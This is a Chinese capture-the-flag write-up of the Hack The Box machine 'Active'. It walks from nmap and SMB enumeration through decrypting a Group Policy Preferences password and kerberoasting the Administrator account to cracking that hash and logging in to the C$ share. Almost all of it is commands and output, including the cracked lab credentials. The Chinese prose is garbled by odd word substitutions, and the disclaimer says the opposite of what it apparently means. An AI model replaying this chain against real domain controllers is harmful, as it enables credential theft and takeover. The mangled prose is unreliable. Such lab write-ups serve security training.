免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责
服务探测
查看开启端口服务
┌──(rootkali)-[~/htb/Active]└─# nmap -p- 10.10.10.100 --openStarting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 04:33 ESTNmap scan report for 10.10.10.100Host is up (0.30s latency).Not shown: 65508 closed ports, 4 filtered portsSome closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE53/tcp open domain88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp open kpasswd5593/tcp open http-rpc-epmap636/tcp open ldapssl3268/tcp open globalcatLDAP3269/tcp open globalcatLDAPssl5722/tcp open msdfsr9389/tcp open adws47001/tcp open winrm49152/tcp open unknown49153/tcp open unknown49154/tcp open unknown49155/tcp open unknown49157/tcp open unknown49158/tcp open unknown49169/tcp open unknown49171/tcp open unknown49180/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 136.09 seconds查看对应端口详细信息
┌──(rootkali)-[~/htb/Active]└─# nmap -sV -T4 -A -O -p 53,88,135,389,445,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49180 10.10.10.100Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 04:37 ESTNmap scan report for 10.10.10.100Host is up (0.29s latency).PORT STATE SERVICE VERSION53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)| dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-29 09:37:56Z)135/tcp open msrpc Microsoft Windows RPC389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)445/tcp open microsoft-ds?593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0636/tcp open tcpwrapped3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)3269/tcp open tcpwrapped5722/tcp open msrpc Microsoft Windows RPC9389/tcp open mc-nmf .NET Message Framing47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)|_http-server-header: Microsoft-HTTPAPI/2.0|_http-title: Not Found49152/tcp open msrpc Microsoft Windows RPC49153/tcp open msrpc Microsoft Windows RPC49154/tcp open msrpc Microsoft Windows RPC49155/tcp open msrpc Microsoft Windows RPC49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.049158/tcp open msrpc Microsoft Windows RPC49169/tcp open msrpc Microsoft Windows RPC49171/tcp open msrpc Microsoft Windows RPC49180/tcp open msrpc Microsoft Windows RPCWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (97%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (96%), Microsoft Windows Server 2008 R2 SP1 (96%), Microsoft Windows Server 2008 SP1 (96%), Microsoft Windows Server 2008 SP2 (96%), Microsoft Windows 7 (96%), Microsoft Windows 7 SP0 - SP1 or Windows Server 2008 (96%), Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1 (96%), Microsoft Windows 7 SP1 (96%), Microsoft Windows 7 Ultimate (96%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windowsHost script results:|_clock-skew: -2s| smb2-security-mode: | 2.02: |_ Message signing enabled and required| smb2-time: | date: 2021-12-29T09:39:06|_ start_date: 2021-12-29T09:31:20TRACEROUTE (using port 53/tcp)HOP RTT ADDRESS1 283.07 ms 10.10.14.12 284.19 ms 10.10.10.100OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 92.68 seconds有流动目录还有DNS,那这台应该是DC服务器
先从samba开始,枚举共享目录
┌──(rootkali)-[~/htb/Active]└─# smbmap -u '' -H 10.10.10.100[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON NO ACCESS Logon server share Replication READ ONLY SYSVOL NO ACCESS Logon server share Users NO ACCESS匿名账号只能够进入Replication
登录
──(rootkali)-[~/htb/Active]└─# smbclient --no-pass //10.10.10.100/Replication 1 ⨯Anonymous login successfulTry "help" to get a list of possible commands.smb: \> ls . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 active.htb D 0 Sat Jul 21 06:37:44 2018下载所有文件到本地待剖析
smb: \> recurse onsmb: \> prompt offsmb: \> mget *active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml 爆出一个登录账号凭据
┌──(rootkali)-[~/…/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups]└─# cat Groups.xml <?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>用户名:active.htb\SVC_TGS
哈希:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
在谷歌搜寻Groups.xml decrypt找到这个文件的解密办法:gpp-decrypt
┌──(rootkali)-[~/htb/Active]└─# gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"GPPstillStandingStrong2k18解出明码为:GPPstillStandingStrong2k18
查看该账户smb权限
┌──(rootkali)-[~/htb/Active]└─# smbmap -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -H 10.10.10.100[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ NO ACCESS Remote IPC NETLOGON READ ONLY Logon server share Replication READ ONLY SYSVOL READ ONLY Logon server share Users READ ONLYuser.txt
应用上面命令登录Users文件夹
smbclient -U 'active.htb/SVC_TGS%GPPstillStandingStrong2k18' //10.10.10.100/Users
找到user.txt
smb: \SVC_TGS\Desktop\> pwdCurrent directory is \\10.10.10.100\Users\SVC_TGS\Desktop\smb: \SVC_TGS\Desktop\> ls . D 0 Sat Jul 21 11:14:42 2018 .. D 0 Sat Jul 21 11:14:42 2018 user.txt A 34 Sat Jul 21 11:06:25 2018挂载分享目录
装置cifsapt install cifs-utils
把Users共享目录挂载到本地
mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/Users /mnt/users
进到/mnt/users目录,执行以下命令,列出所有可读文件find . -ls -type f
顺次挂载NETLOGON和SYSVOL到本地
┌──(rootkali)-[~/htb/Active]└─# mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/NETLOGON /mnt/NETLOGON ┌──(rootkali)-[~/htb/Active]└─# mount -t cifs -o 'username=SVC_TGS,password=GPPstillStandingStrong2k18' //10.10.10.100/SYSVOL /mnt/SYSVOL别离到/mnt/NETLOGON和/mnt/SYSVOL运行以下命令:find ./|xargs grep -ri 'password' -l
找到一个和咱们下面找到的一样的文件
┌──(rootkali)-[/mnt/SYSVOL]└─# cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml 123 ⨯<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User></Groups>除此以外没有其余有用的文件,看来445端口曾经没有有价值的货色
kerberos
留意到靶机开启了kerberos服务
当初咱们有了一个账号的信息,晓得了域的名称,能够应用GetUserSPNs.py获取票据
应用命令:python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
返回了Administrator的哈希明码
└─# python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS Impacket v0.9.22 - Copyright 2020 SecureAuth CorporationPassword:ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2021-01-21 11:07:03.723783 $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$d5d94b46d32eed4359851547f776ab30$284fc8be86870c148fb7fd4e01df702eebce6191b5a587fedd331cd603c0bee0f4ff4d947d826c4a51af5f4de01a583aea555ce5d7d9710cafc8f8eb27d6a2ee56775cb5aca52c0511ecdf0dbd13f7325ce41d0c1fa014b2dffa17e3580b29f31bc2b847420f59abe6fb6463f9213396f13de461b4c2d1190abd036ece8ab8bf7b9728c67b412a8684acbe52404aed50b5537eb1f0d51e0ac038d66e60ac2d0ee4558e5dc9a4f258cf0c9c75f35d5bcab7ad6f697ec6433675df059cbb9a3dfd7d8d944d1595ad21a3c09ea49153774822a7a146f889274863de24645675bab649ff034fffbf36b74f3d7b04f0164750752842c63db26e52b539c1e21ecc75f114d76d0e31d0832e40a6eeec60e9356284dd242daf2327f532c959752437a3180db3e6df4bd8165f543d0b4d95e13908c8a974a568793b3b61271695edddd8c8362c355ab669be8ca1fbcbe80b6668e186e0700a4552fe1683597b271883a44144e2ffe06e35802e1d2c85c6d9f217218e86af1132d1315a6e047675b99c1115d0af4a52db2b48246230744980886e7f73442d0fed61e51efa19587d5f60fa319fadc9c9cc6ace7dcaeeeaed3668615b1ba6b7b48286542ded70ed6dd2858012fd1fd6f2427ba3c2b89f30b072134072bd02859e114bec3796bef12399603f80ceaaf909f9e70ed5c99e919b08d0383f1826804668d65318fcd4a624b9239558839722a519358972329c4e41311accf9e715f1be5c8c0ed07527d118e141d3601a92fa49461f399f106ff52790bef6612790841468864e5df127b1464332ff3bb481383c7ab7352eec5dc39175d46d2133173f9024421c4a65d5d04ded937a7bc6e5f77cb75aa848180a61e8dd9bba5790468b503709960b54eee9591766cdccbb864a1e3158c5a9b732a52ed3a07fef81d8409df1443ef5c8c195964a7ba2e617b4e1e3e1087ef20fa05f854fa05b07a7c3fcf66025204832f6607b6ce4a1dafb1cd549adeac90d6fc319d5fffca158080a4cb2c5a0a7b27f6ddc34e4039694f0d285628aa698d3e5800271b5f589261b979a5eece8d230345fdb2ce5046a0584ff09e22a2eb6ab4ca0e2f29cce6358680df9ff356a704b2630cb476dc5cf7cde997223b96707d0f3dbfd1324df999c91874d774e7ae10ff9f424f75c3e030f504e6abb2c0baf8b714f8aace32dc56a090f43d29a572cc3da6354a8562667575ddb591c4cae09059398c4f4a835a051a9dc4948859bb145bf67保留到本地,应用john破解
┌──(rootkali)-[~/htb/Active]└─# john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast Using default input encoding: UTF-8Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])Will run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusTicketmaster1968 (?)1g 0:00:00:05 DONE (2021-12-29 10:06) 0.1964g/s 2070Kp/s 2070Kc/s 2070KC/s Tiffani1432..Thrash1Use the "--show" option to display all of the cracked passwords reliablySession completed ┌──(rootkali)-[~/htb/Active]└─# john --show hashes.kerberoast ?:Ticketmaster19681 password hash cracked, 0 left破解明码为:Ticketmaster1968
root.txt
用Administrator:Ticketmaster1968登录到C盘
┌──(rootkali)-[~/htb/Active]└─# smbclient -U 'active.htb/Administrator%Ticketmaster1968' //10.10.10.100/C$Try "help" to get a list of possible commands.smb: \> ls $Recycle.Bin DHS 0 Mon Jul 13 22:34:39 2009 Config.Msi DHS 0 Mon Jul 30 10:10:06 2018 Documents and Settings DHSrn 0 Tue Jul 14 01:06:44 2009 pagefile.sys AHS 4294434816 Wed Dec 29 08:59:57 2021 PerfLogs D 0 Mon Jul 13 23:20:08 2009 Program Files DR 0 Wed Jul 18 14:44:51 2018 Program Files (x86) DR 0 Thu Jan 21 11:49:16 2021 ProgramData DHn 0 Mon Jul 30 09:49:31 2018 Recovery DHSn 0 Mon Jul 16 06:13:22 2018 System Volume Information DHS 0 Wed Jul 18 14:45:01 2018 Users DR 0 Sat Jul 21 10:39:20 2018 Windows D 0 Mon Jul 30 09:42:18 2018拿到root.txt
smb: \users\Administrator\desktop\> ls . DR 0 Thu Jan 21 11:49:47 2021 .. DR 0 Thu Jan 21 11:49:47 2021 desktop.ini AHS 282 Mon Jul 30 09:50:10 2018 root.txt A 34 Sat Jul 21 11:06:07 2018